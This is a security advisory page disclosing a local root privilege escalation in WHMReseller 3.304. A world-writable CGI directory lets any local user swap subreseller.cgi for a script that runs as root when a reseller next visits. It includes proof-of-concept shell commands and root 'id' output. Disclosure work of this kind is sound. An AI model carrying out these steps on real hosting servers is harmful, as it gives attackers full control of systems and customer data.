WebhostSecurity.com
ARTICLES
› Lessons Learned - Defense
› Lessons Learned - Offense
› Finding Bugs 1 - Softaculous
› Finding Bugs 2 - cPanel + Horde
› uid/gid Reuse Multi Vendor Issue
› Finding the WordPress 2.1.1 Backdoor
› Discovering Cdorked.A on cPanel
OFFENSE
› AtMail
› BFD
› cPanel
› CSF
› DirectAdmin
› Installatron
› Juniper
› Kloxo
› OSSEC
› Softaculous
› WHMEZLogin
› WHMReseller
DEFENSE
› STFN - Suspicious /tmp File Notifier
› ELM - Exim Log Monitor
› RFID - Remote File Inclusion Detector
› Twitter


WHMReseller 3.304 - any local user could execute commands as root


DESCRIPTION

World writable permissions on /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller allowed any local user to execute command as root.


IMPACT

Local users could obtain full root access.


When WHMReseller 3.304 was installed, it changed the permissions of the whmreseller/ directory to 0777:

31802 chmod("./whmreseller", 0777)      = 0


As such, you can rename and then recreate any existing file in that directory.

[user@host ~]$ cd /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller
[user@host /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller]$ mv subreseller.cgi subreseller.cgi.old
[user@host /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller]$ cat > subreseller.cgi << EOF
#!/bin/sh
/usr/bin/id > /home/user/id.out
EOF


The next time a reseller accesses WHMReseller, your commands in the subreseller.cgi file you created will be executed as root:

[user@host ~]$ cat id.out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


WebhostSecurity.com © 2009 - 2020